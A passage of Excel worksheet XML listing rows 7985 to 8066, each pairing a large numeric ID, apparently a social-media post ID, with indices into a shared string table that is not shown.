      <c r="E7985" t="s">
        <v>19277</v>
      </c>
    </row>
    <row r="7986" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7986">
        <v>1.2329816243730701E+18</v>
      </c>
      <c r="B7986" t="s">
        <v>19278</v>
      </c>
      <c r="C7986" t="s">
        <v>1</v>
      </c>
      <c r="D7986" t="s">
        <v>19279</v>
      </c>
      <c r="E7986" t="s">
        <v>19280</v>
      </c>
    </row>
    <row r="7987" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7987">
        <v>1.23298158032863E+18</v>
      </c>
      <c r="B7987" t="s">
        <v>19281</v>
      </c>
      <c r="C7987" t="s">
        <v>1</v>
      </c>
      <c r="D7987" t="s">
        <v>19282</v>
      </c>
      <c r="E7987" t="s">
        <v>19283</v>
      </c>
    </row>
    <row r="7988" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7988">
        <v>1.2329815763734001E+18</v>
      </c>
      <c r="B7988" t="s">
        <v>19284</v>
      </c>
      <c r="C7988" t="s">
        <v>1</v>
      </c>
      <c r="D7988" t="s">
        <v>19285</v>
      </c>
      <c r="E7988" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="7989" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7989">
        <v>1.23298076925517E+18</v>
      </c>
      <c r="B7989" t="s">
        <v>19286</v>
      </c>
      <c r="C7989" t="s">
        <v>1</v>
      </c>
      <c r="D7989" t="s">
        <v>19287</v>
      </c>
      <c r="E7989" t="s">
        <v>19288</v>
      </c>
    </row>
    <row r="7990" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7990">
        <v>1.23298040189698E+18</v>
      </c>
      <c r="B7990" t="s">
        <v>19289</v>
      </c>
      <c r="C7990" t="s">
        <v>1</v>
      </c>
      <c r="D7990" t="s">
        <v>19290</v>
      </c>
      <c r="E7990" t="s">
        <v>19291</v>
      </c>
    </row>
    <row r="7991" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7991">
        <v>1.23298021344256E+18</v>
      </c>
      <c r="B7991" t="s">
        <v>19292</v>
      </c>
      <c r="C7991" t="s">
        <v>1</v>
      </c>
      <c r="D7991" t="s">
        <v>19293</v>
      </c>
      <c r="E7991" t="s">
        <v>19294</v>
      </c>
    </row>
    <row r="7992" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7992">
        <v>1.23298002185118E+18</v>
      </c>
      <c r="B7992" t="s">
        <v>19295</v>
      </c>
      <c r="C7992" t="s">
        <v>1</v>
      </c>
      <c r="D7992" t="s">
        <v>19296</v>
      </c>
      <c r="E7992" t="s">
        <v>19297</v>
      </c>
    </row>
    <row r="7993" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7993">
        <v>1.2329800061141399E+18</v>
      </c>
      <c r="B7993" t="s">
        <v>19298</v>
      </c>
      <c r="C7993" t="s">
        <v>1</v>
      </c>
      <c r="D7993" t="s">
        <v>19299</v>
      </c>
      <c r="E7993" t="s">
        <v>19300</v>
      </c>
    </row>
    <row r="7994" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7994">
        <v>1.2329799910439401E+18</v>
      </c>
      <c r="B7994" t="s">
        <v>19301</v>
      </c>
      <c r="C7994" t="s">
        <v>1</v>
      </c>
      <c r="D7994" t="s">
        <v>19302</v>
      </c>
      <c r="E7994" t="s">
        <v>11920</v>
      </c>
    </row>
    <row r="7995" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7995">
        <v>1.23297994581261E+18</v>
      </c>
      <c r="B7995" t="s">
        <v>19303</v>
      </c>
      <c r="C7995" t="s">
        <v>1</v>
      </c>
      <c r="D7995" t="s">
        <v>19304</v>
      </c>
      <c r="E7995" t="s">
        <v>16382</v>
      </c>
    </row>
    <row r="7996" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7996">
        <v>1.2329792011642701E+18</v>
      </c>
      <c r="B7996" t="s">
        <v>19305</v>
      </c>
      <c r="C7996" t="s">
        <v>1</v>
      </c>
      <c r="D7996" t="s">
        <v>19306</v>
      </c>
      <c r="E7996" t="s">
        <v>16382</v>
      </c>
    </row>
    <row r="7997" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7997">
        <v>1.2329791096738701E+18</v>
      </c>
      <c r="B7997" t="s">
        <v>19307</v>
      </c>
      <c r="C7997" t="s">
        <v>1</v>
      </c>
      <c r="D7997" t="s">
        <v>19308</v>
      </c>
      <c r="E7997" t="s">
        <v>19309</v>
      </c>
    </row>
    <row r="7998" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7998">
        <v>1.2329788032170399E+18</v>
      </c>
      <c r="B7998" t="s">
        <v>19310</v>
      </c>
      <c r="C7998" t="s">
        <v>1</v>
      </c>
      <c r="D7998" t="s">
        <v>19311</v>
      </c>
      <c r="E7998" t="s">
        <v>19312</v>
      </c>
    </row>
    <row r="7999" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A7999">
        <v>1.23297879338979E+18</v>
      </c>
      <c r="B7999" t="s">
        <v>19313</v>
      </c>
      <c r="C7999" t="s">
        <v>1</v>
      </c>
      <c r="D7999" t="s">
        <v>19314</v>
      </c>
      <c r="E7999" t="s">
        <v>19315</v>
      </c>
    </row>
    <row r="8000" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8000">
        <v>1.23297756603582E+18</v>
      </c>
      <c r="B8000" t="s">
        <v>19316</v>
      </c>
      <c r="C8000" t="s">
        <v>1</v>
      </c>
      <c r="D8000" t="s">
        <v>19317</v>
      </c>
      <c r="E8000" t="s">
        <v>19318</v>
      </c>
    </row>
    <row r="8001" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8001">
        <v>1.23297738394845E+18</v>
      </c>
      <c r="B8001" t="s">
        <v>19319</v>
      </c>
      <c r="C8001" t="s">
        <v>1</v>
      </c>
      <c r="D8001" t="s">
        <v>19320</v>
      </c>
      <c r="E8001" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="8002" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8002">
        <v>1.23297637625441E+18</v>
      </c>
      <c r="B8002" t="s">
        <v>19321</v>
      </c>
      <c r="C8002" t="s">
        <v>1</v>
      </c>
      <c r="D8002" t="s">
        <v>19322</v>
      </c>
      <c r="E8002" t="s">
        <v>19277</v>
      </c>
    </row>
    <row r="8003" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8003">
        <v>1.2329763202812101E+18</v>
      </c>
      <c r="B8003" t="s">
        <v>19323</v>
      </c>
      <c r="C8003" t="s">
        <v>1</v>
      </c>
      <c r="D8003" t="s">
        <v>19324</v>
      </c>
      <c r="E8003" t="s">
        <v>19325</v>
      </c>
    </row>
    <row r="8004" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8004">
        <v>1.23297625175489E+18</v>
      </c>
      <c r="B8004" t="s">
        <v>19326</v>
      </c>
      <c r="C8004" t="s">
        <v>1</v>
      </c>
      <c r="D8004" t="s">
        <v>19327</v>
      </c>
      <c r="E8004" t="s">
        <v>9125</v>
      </c>
    </row>
    <row r="8005" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8005">
        <v>1.23297616785616E+18</v>
      </c>
      <c r="B8005" t="s">
        <v>19328</v>
      </c>
      <c r="C8005" t="s">
        <v>1</v>
      </c>
      <c r="D8005" t="s">
        <v>19329</v>
      </c>
      <c r="E8005" t="s">
        <v>19330</v>
      </c>
    </row>
    <row r="8006" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8006">
        <v>1.23297616590161E+18</v>
      </c>
      <c r="B8006" t="s">
        <v>19328</v>
      </c>
      <c r="C8006" t="s">
        <v>1</v>
      </c>
      <c r="D8006" t="s">
        <v>19331</v>
      </c>
      <c r="E8006" t="s">
        <v>13536</v>
      </c>
    </row>
    <row r="8007" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8007">
        <v>1.2329752384653701E+18</v>
      </c>
      <c r="B8007" t="s">
        <v>19332</v>
      </c>
      <c r="C8007" t="s">
        <v>1</v>
      </c>
      <c r="D8007" t="s">
        <v>19333</v>
      </c>
      <c r="E8007" t="s">
        <v>18866</v>
      </c>
    </row>
    <row r="8008" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8008">
        <v>1.2329741323183501E+18</v>
      </c>
      <c r="B8008" t="s">
        <v>19334</v>
      </c>
      <c r="C8008" t="s">
        <v>1</v>
      </c>
      <c r="D8008" t="s">
        <v>19335</v>
      </c>
      <c r="E8008" t="s">
        <v>19336</v>
      </c>
    </row>
    <row r="8009" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8009">
        <v>1.2329734064732401E+18</v>
      </c>
      <c r="B8009" t="s">
        <v>19337</v>
      </c>
      <c r="C8009" t="s">
        <v>1</v>
      </c>
      <c r="D8009" t="s">
        <v>19338</v>
      </c>
      <c r="E8009" t="s">
        <v>15473</v>
      </c>
    </row>
    <row r="8010" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8010">
        <v>1.23297333561039E+18</v>
      </c>
      <c r="B8010" t="s">
        <v>19339</v>
      </c>
      <c r="C8010" t="s">
        <v>1</v>
      </c>
      <c r="D8010" t="s">
        <v>19340</v>
      </c>
      <c r="E8010" t="s">
        <v>19341</v>
      </c>
    </row>
    <row r="8011" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8011">
        <v>1.2329727779944901E+18</v>
      </c>
      <c r="B8011" t="s">
        <v>19342</v>
      </c>
      <c r="C8011" t="s">
        <v>1</v>
      </c>
      <c r="D8011" t="s">
        <v>19343</v>
      </c>
      <c r="E8011" t="s">
        <v>18828</v>
      </c>
    </row>
    <row r="8012" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8012">
        <v>1.2329724127587599E+18</v>
      </c>
      <c r="B8012" t="s">
        <v>19344</v>
      </c>
      <c r="C8012" t="s">
        <v>1</v>
      </c>
      <c r="D8012" t="s">
        <v>19345</v>
      </c>
      <c r="E8012" t="s">
        <v>19346</v>
      </c>
    </row>
    <row r="8013" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8013">
        <v>1.2329723911914701E+18</v>
      </c>
      <c r="B8013" t="s">
        <v>19347</v>
      </c>
      <c r="C8013" t="s">
        <v>1</v>
      </c>
      <c r="D8013" t="s">
        <v>19348</v>
      </c>
      <c r="E8013" t="s">
        <v>236</v>
      </c>
    </row>
    <row r="8014" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8014">
        <v>1.23297188620163E+18</v>
      </c>
      <c r="B8014" t="s">
        <v>19349</v>
      </c>
      <c r="C8014" t="s">
        <v>1</v>
      </c>
      <c r="D8014" t="s">
        <v>19350</v>
      </c>
      <c r="E8014" t="s">
        <v>19351</v>
      </c>
    </row>
    <row r="8015" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8015">
        <v>1.2329712730613199E+18</v>
      </c>
      <c r="B8015" t="s">
        <v>19352</v>
      </c>
      <c r="C8015" t="s">
        <v>1</v>
      </c>
      <c r="D8015" t="s">
        <v>19353</v>
      </c>
      <c r="E8015" t="s">
        <v>19354</v>
      </c>
    </row>
    <row r="8016" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8016">
        <v>1.2329712714423501E+18</v>
      </c>
      <c r="B8016" t="s">
        <v>19352</v>
      </c>
      <c r="C8016" t="s">
        <v>1</v>
      </c>
      <c r="D8016" t="s">
        <v>19355</v>
      </c>
      <c r="E8016" t="s">
        <v>19356</v>
      </c>
    </row>
    <row r="8017" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8017">
        <v>1.2329708148337999E+18</v>
      </c>
      <c r="B8017" t="s">
        <v>19357</v>
      </c>
      <c r="C8017" t="s">
        <v>1</v>
      </c>
      <c r="D8017" t="s">
        <v>19358</v>
      </c>
      <c r="E8017" t="s">
        <v>9302</v>
      </c>
    </row>
    <row r="8018" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8018">
        <v>1.2329702880459899E+18</v>
      </c>
      <c r="B8018" t="s">
        <v>19359</v>
      </c>
      <c r="C8018" t="s">
        <v>1</v>
      </c>
      <c r="D8018" t="s">
        <v>19360</v>
      </c>
      <c r="E8018" t="s">
        <v>19361</v>
      </c>
    </row>
    <row r="8019" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8019">
        <v>1.23296993206275E+18</v>
      </c>
      <c r="B8019" t="s">
        <v>19362</v>
      </c>
      <c r="C8019" t="s">
        <v>1</v>
      </c>
      <c r="D8019" t="s">
        <v>19363</v>
      </c>
      <c r="E8019" t="s">
        <v>19364</v>
      </c>
    </row>
    <row r="8020" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8020">
        <v>1.2329696486453199E+18</v>
      </c>
      <c r="B8020" t="s">
        <v>19365</v>
      </c>
      <c r="C8020" t="s">
        <v>1</v>
      </c>
      <c r="D8020" t="s">
        <v>19366</v>
      </c>
      <c r="E8020" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="8021" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8021">
        <v>1.23296913712051E+18</v>
      </c>
      <c r="B8021" t="s">
        <v>19367</v>
      </c>
      <c r="C8021" t="s">
        <v>1</v>
      </c>
      <c r="D8021" t="s">
        <v>19368</v>
      </c>
      <c r="E8021" t="s">
        <v>19369</v>
      </c>
    </row>
    <row r="8022" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8022">
        <v>1.23296901117822E+18</v>
      </c>
      <c r="B8022" t="s">
        <v>19370</v>
      </c>
      <c r="C8022" t="s">
        <v>1</v>
      </c>
      <c r="D8022" t="s">
        <v>19371</v>
      </c>
      <c r="E8022" t="s">
        <v>2671</v>
      </c>
    </row>
    <row r="8023" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8023">
        <v>1.23296871857938E+18</v>
      </c>
      <c r="B8023" t="s">
        <v>19372</v>
      </c>
      <c r="C8023" t="s">
        <v>1</v>
      </c>
      <c r="D8023" t="s">
        <v>19373</v>
      </c>
      <c r="E8023" t="s">
        <v>975</v>
      </c>
    </row>
    <row r="8024" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8024">
        <v>1.2329679874031099E+18</v>
      </c>
      <c r="B8024" t="s">
        <v>19374</v>
      </c>
      <c r="C8024" t="s">
        <v>1</v>
      </c>
      <c r="D8024" t="s">
        <v>19375</v>
      </c>
      <c r="E8024" t="s">
        <v>14202</v>
      </c>
    </row>
    <row r="8025" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8025">
        <v>1.2329676838403799E+18</v>
      </c>
      <c r="B8025" t="s">
        <v>19376</v>
      </c>
      <c r="C8025" t="s">
        <v>1</v>
      </c>
      <c r="D8025" t="s">
        <v>19377</v>
      </c>
      <c r="E8025" t="s">
        <v>7496</v>
      </c>
    </row>
    <row r="8026" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8026">
        <v>1.23296730310656E+18</v>
      </c>
      <c r="B8026" t="s">
        <v>19378</v>
      </c>
      <c r="C8026" t="s">
        <v>1</v>
      </c>
      <c r="D8026" t="s">
        <v>19379</v>
      </c>
      <c r="E8026" t="s">
        <v>19380</v>
      </c>
    </row>
    <row r="8027" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8027">
        <v>1.23296666608832E+18</v>
      </c>
      <c r="B8027" t="s">
        <v>19381</v>
      </c>
      <c r="C8027" t="s">
        <v>1</v>
      </c>
      <c r="D8027" t="s">
        <v>19382</v>
      </c>
      <c r="E8027" t="s">
        <v>19383</v>
      </c>
    </row>
    <row r="8028" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8028">
        <v>1.2329666555648E+18</v>
      </c>
      <c r="B8028" t="s">
        <v>19384</v>
      </c>
      <c r="C8028" t="s">
        <v>1</v>
      </c>
      <c r="D8028" t="s">
        <v>19385</v>
      </c>
      <c r="E8028" t="s">
        <v>19386</v>
      </c>
    </row>
    <row r="8029" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8029">
        <v>1.2329665110961999E+18</v>
      </c>
      <c r="B8029" t="s">
        <v>19387</v>
      </c>
      <c r="C8029" t="s">
        <v>1</v>
      </c>
      <c r="D8029" t="s">
        <v>19388</v>
      </c>
      <c r="E8029" t="s">
        <v>19389</v>
      </c>
    </row>
    <row r="8030" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8030">
        <v>1.2329659604218199E+18</v>
      </c>
      <c r="B8030" t="s">
        <v>19390</v>
      </c>
      <c r="C8030" t="s">
        <v>1</v>
      </c>
      <c r="D8030" t="s">
        <v>19391</v>
      </c>
      <c r="E8030" t="s">
        <v>19392</v>
      </c>
    </row>
    <row r="8031" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8031">
        <v>1.23296580976658E+18</v>
      </c>
      <c r="B8031" t="s">
        <v>19393</v>
      </c>
      <c r="C8031" t="s">
        <v>1</v>
      </c>
      <c r="D8031" t="s">
        <v>19394</v>
      </c>
      <c r="E8031" t="s">
        <v>9507</v>
      </c>
    </row>
    <row r="8032" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8032">
        <v>1.2329655419392799E+18</v>
      </c>
      <c r="B8032" t="s">
        <v>19395</v>
      </c>
      <c r="C8032" t="s">
        <v>1</v>
      </c>
      <c r="D8032" t="s">
        <v>19396</v>
      </c>
      <c r="E8032" t="s">
        <v>19397</v>
      </c>
    </row>
    <row r="8033" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8033">
        <v>1.2329653574947699E+18</v>
      </c>
      <c r="B8033" t="s">
        <v>19398</v>
      </c>
      <c r="C8033" t="s">
        <v>1</v>
      </c>
      <c r="D8033" t="s">
        <v>19399</v>
      </c>
      <c r="E8033" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="8034" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8034">
        <v>1.23296479281986E+18</v>
      </c>
      <c r="B8034" t="s">
        <v>19400</v>
      </c>
      <c r="C8034" t="s">
        <v>1</v>
      </c>
      <c r="D8034" t="s">
        <v>19401</v>
      </c>
      <c r="E8034" t="s">
        <v>17574</v>
      </c>
    </row>
    <row r="8035" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8035">
        <v>1.23296473054703E+18</v>
      </c>
      <c r="B8035" t="s">
        <v>19402</v>
      </c>
      <c r="C8035" t="s">
        <v>1</v>
      </c>
      <c r="D8035" t="s">
        <v>19403</v>
      </c>
      <c r="E8035" t="s">
        <v>19404</v>
      </c>
    </row>
    <row r="8036" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8036">
        <v>1.23296422617778E+18</v>
      </c>
      <c r="B8036" t="s">
        <v>19405</v>
      </c>
      <c r="C8036" t="s">
        <v>1</v>
      </c>
      <c r="D8036" t="s">
        <v>19406</v>
      </c>
      <c r="E8036" t="s">
        <v>19407</v>
      </c>
    </row>
    <row r="8037" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8037">
        <v>1.23296397804275E+18</v>
      </c>
      <c r="B8037" t="s">
        <v>19408</v>
      </c>
      <c r="C8037" t="s">
        <v>1</v>
      </c>
      <c r="D8037" t="s">
        <v>19409</v>
      </c>
      <c r="E8037" t="s">
        <v>2524</v>
      </c>
    </row>
    <row r="8038" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8038">
        <v>1.2329638713103201E+18</v>
      </c>
      <c r="B8038" t="s">
        <v>19410</v>
      </c>
      <c r="C8038" t="s">
        <v>1</v>
      </c>
      <c r="D8038" t="s">
        <v>19411</v>
      </c>
      <c r="E8038" t="s">
        <v>19412</v>
      </c>
    </row>
    <row r="8039" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8039">
        <v>1.23296375387821E+18</v>
      </c>
      <c r="B8039" t="s">
        <v>19413</v>
      </c>
      <c r="C8039" t="s">
        <v>1</v>
      </c>
      <c r="D8039" t="s">
        <v>19414</v>
      </c>
      <c r="E8039" t="s">
        <v>19415</v>
      </c>
    </row>
    <row r="8040" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8040">
        <v>1.23296287852274E+18</v>
      </c>
      <c r="B8040" t="s">
        <v>19416</v>
      </c>
      <c r="C8040" t="s">
        <v>1</v>
      </c>
      <c r="D8040" t="s">
        <v>19417</v>
      </c>
      <c r="E8040" t="s">
        <v>12060</v>
      </c>
    </row>
    <row r="8041" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8041">
        <v>1.2329626577471201E+18</v>
      </c>
      <c r="B8041" t="s">
        <v>19418</v>
      </c>
      <c r="C8041" t="s">
        <v>1</v>
      </c>
      <c r="D8041" t="s">
        <v>19419</v>
      </c>
      <c r="E8041" t="s">
        <v>19420</v>
      </c>
    </row>
    <row r="8042" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8042">
        <v>1.23296263047155E+18</v>
      </c>
      <c r="B8042" t="s">
        <v>19421</v>
      </c>
      <c r="C8042" t="s">
        <v>1</v>
      </c>
      <c r="D8042" t="s">
        <v>19422</v>
      </c>
      <c r="E8042" t="s">
        <v>19423</v>
      </c>
    </row>
    <row r="8043" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8043">
        <v>1.2329616997093499E+18</v>
      </c>
      <c r="B8043" t="s">
        <v>19424</v>
      </c>
      <c r="C8043" t="s">
        <v>1</v>
      </c>
      <c r="D8043" t="s">
        <v>19425</v>
      </c>
      <c r="E8043" t="s">
        <v>19426</v>
      </c>
    </row>
    <row r="8044" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8044">
        <v>1.2329611268639401E+18</v>
      </c>
      <c r="B8044" t="s">
        <v>19427</v>
      </c>
      <c r="C8044" t="s">
        <v>1</v>
      </c>
      <c r="D8044" t="s">
        <v>19428</v>
      </c>
      <c r="E8044" t="s">
        <v>6160</v>
      </c>
    </row>
    <row r="8045" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8045">
        <v>1.2329610922525499E+18</v>
      </c>
      <c r="B8045" t="s">
        <v>19429</v>
      </c>
      <c r="C8045" t="s">
        <v>1</v>
      </c>
      <c r="D8045" t="s">
        <v>19430</v>
      </c>
      <c r="E8045" t="s">
        <v>19431</v>
      </c>
    </row>
    <row r="8046" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8046">
        <v>1.23296075546655E+18</v>
      </c>
      <c r="B8046" t="s">
        <v>19432</v>
      </c>
      <c r="C8046" t="s">
        <v>1</v>
      </c>
      <c r="D8046" t="s">
        <v>19433</v>
      </c>
      <c r="E8046" t="s">
        <v>19434</v>
      </c>
    </row>
    <row r="8047" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8047">
        <v>1.2329604260711099E+18</v>
      </c>
      <c r="B8047" t="s">
        <v>19435</v>
      </c>
      <c r="C8047" t="s">
        <v>1</v>
      </c>
      <c r="D8047" t="s">
        <v>19436</v>
      </c>
      <c r="E8047" t="s">
        <v>19437</v>
      </c>
    </row>
    <row r="8048" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8048">
        <v>1.2329599587587E+18</v>
      </c>
      <c r="B8048" t="s">
        <v>19438</v>
      </c>
      <c r="C8048" t="s">
        <v>1</v>
      </c>
      <c r="D8048" t="s">
        <v>19439</v>
      </c>
      <c r="E8048" t="s">
        <v>19440</v>
      </c>
    </row>
    <row r="8049" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8049">
        <v>1.23295985113681E+18</v>
      </c>
      <c r="B8049" t="s">
        <v>19441</v>
      </c>
      <c r="C8049" t="s">
        <v>1</v>
      </c>
      <c r="D8049" t="s">
        <v>19442</v>
      </c>
      <c r="E8049" t="s">
        <v>19443</v>
      </c>
    </row>
    <row r="8050" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8050">
        <v>1.2329598105864901E+18</v>
      </c>
      <c r="B8050" t="s">
        <v>19444</v>
      </c>
      <c r="C8050" t="s">
        <v>1</v>
      </c>
      <c r="D8050" t="s">
        <v>19445</v>
      </c>
      <c r="E8050" t="s">
        <v>19446</v>
      </c>
    </row>
    <row r="8051" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8051">
        <v>1.23295978660749E+18</v>
      </c>
      <c r="B8051" t="s">
        <v>19447</v>
      </c>
      <c r="C8051" t="s">
        <v>1</v>
      </c>
      <c r="D8051" t="s">
        <v>19448</v>
      </c>
      <c r="E8051" t="s">
        <v>6762</v>
      </c>
    </row>
    <row r="8052" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8052">
        <v>1.23295947518882E+18</v>
      </c>
      <c r="B8052" t="s">
        <v>19449</v>
      </c>
      <c r="C8052" t="s">
        <v>1</v>
      </c>
      <c r="D8052" t="s">
        <v>19450</v>
      </c>
      <c r="E8052" t="s">
        <v>6519</v>
      </c>
    </row>
    <row r="8053" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8053">
        <v>1.2329590678633101E+18</v>
      </c>
      <c r="B8053" t="s">
        <v>19451</v>
      </c>
      <c r="C8053" t="s">
        <v>1</v>
      </c>
      <c r="D8053" t="s">
        <v>19452</v>
      </c>
      <c r="E8053" t="s">
        <v>18737</v>
      </c>
    </row>
    <row r="8054" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8054">
        <v>1.2329585207246001E+18</v>
      </c>
      <c r="B8054" t="s">
        <v>19453</v>
      </c>
      <c r="C8054" t="s">
        <v>1</v>
      </c>
      <c r="D8054" t="s">
        <v>19454</v>
      </c>
      <c r="E8054" t="s">
        <v>19455</v>
      </c>
    </row>
    <row r="8055" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8055">
        <v>1.2329576573021499E+18</v>
      </c>
      <c r="B8055" t="s">
        <v>19456</v>
      </c>
      <c r="C8055" t="s">
        <v>1</v>
      </c>
      <c r="D8055" t="s">
        <v>19457</v>
      </c>
      <c r="E8055" t="s">
        <v>19458</v>
      </c>
    </row>
    <row r="8056" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8056">
        <v>1.23295759507107E+18</v>
      </c>
      <c r="B8056" t="s">
        <v>19459</v>
      </c>
      <c r="C8056" t="s">
        <v>1</v>
      </c>
      <c r="D8056" t="s">
        <v>19460</v>
      </c>
      <c r="E8056" t="s">
        <v>19461</v>
      </c>
    </row>
    <row r="8057" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8057">
        <v>1.2329572982823099E+18</v>
      </c>
      <c r="B8057" t="s">
        <v>19462</v>
      </c>
      <c r="C8057" t="s">
        <v>1</v>
      </c>
      <c r="D8057" t="s">
        <v>19463</v>
      </c>
      <c r="E8057" t="s">
        <v>1926</v>
      </c>
    </row>
    <row r="8058" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8058">
        <v>1.2329555841456901E+18</v>
      </c>
      <c r="B8058" t="s">
        <v>19464</v>
      </c>
      <c r="C8058" t="s">
        <v>1</v>
      </c>
      <c r="D8058" t="s">
        <v>19465</v>
      </c>
      <c r="E8058" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="8059" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8059">
        <v>1.2329554704590799E+18</v>
      </c>
      <c r="B8059" t="s">
        <v>19466</v>
      </c>
      <c r="C8059" t="s">
        <v>1</v>
      </c>
      <c r="D8059" t="s">
        <v>19467</v>
      </c>
      <c r="E8059" t="s">
        <v>2431</v>
      </c>
    </row>
    <row r="8060" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8060">
        <v>1.23295494467376E+18</v>
      </c>
      <c r="B8060" t="s">
        <v>19468</v>
      </c>
      <c r="C8060" t="s">
        <v>1</v>
      </c>
      <c r="D8060" t="s">
        <v>19469</v>
      </c>
      <c r="E8060" t="s">
        <v>19470</v>
      </c>
    </row>
    <row r="8061" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8061">
        <v>1.2329547105393201E+18</v>
      </c>
      <c r="B8061" t="s">
        <v>19471</v>
      </c>
      <c r="C8061" t="s">
        <v>1</v>
      </c>
      <c r="D8061" t="s">
        <v>19472</v>
      </c>
      <c r="E8061" t="s">
        <v>19473</v>
      </c>
    </row>
    <row r="8062" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8062">
        <v>1.2329538284813299E+18</v>
      </c>
      <c r="B8062" t="s">
        <v>19474</v>
      </c>
      <c r="C8062" t="s">
        <v>1</v>
      </c>
      <c r="D8062" t="s">
        <v>19475</v>
      </c>
      <c r="E8062" t="s">
        <v>19476</v>
      </c>
    </row>
    <row r="8063" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8063">
        <v>1.2329537504883E+18</v>
      </c>
      <c r="B8063" t="s">
        <v>19477</v>
      </c>
      <c r="C8063" t="s">
        <v>1</v>
      </c>
      <c r="D8063" t="s">
        <v>19478</v>
      </c>
      <c r="E8063" t="s">
        <v>2489</v>
      </c>
    </row>
    <row r="8064" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8064">
        <v>1.2329536931437399E+18</v>
      </c>
      <c r="B8064" t="s">
        <v>19479</v>
      </c>
      <c r="C8064" t="s">
        <v>1</v>
      </c>
      <c r="D8064" t="s">
        <v>19480</v>
      </c>
      <c r="E8064" t="s">
        <v>251</v>
      </c>
    </row>
    <row r="8065" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8065">
        <v>1.2329535636068101E+18</v>
      </c>
      <c r="B8065" t="s">
        <v>19481</v>
      </c>
      <c r="C8065" t="s">
        <v>1</v>
      </c>
      <c r="D8065" t="s">
        <v>19482</v>
      </c>
      <c r="E8065" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="8066" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A8066">
        <v>1.2329531724418601E+18</v>
      </c>
      <c r="B8066" t="s">
        <v>19483</v>
      </c>
      <c r="C8066" t="s">
        <v>1</v>
      </c>
      <c r="D8066" t="s">
        <v>19484</v>
      </c>
      <c r="E8066" t="s">
        <v>9567</v>
      </c>
    </row>
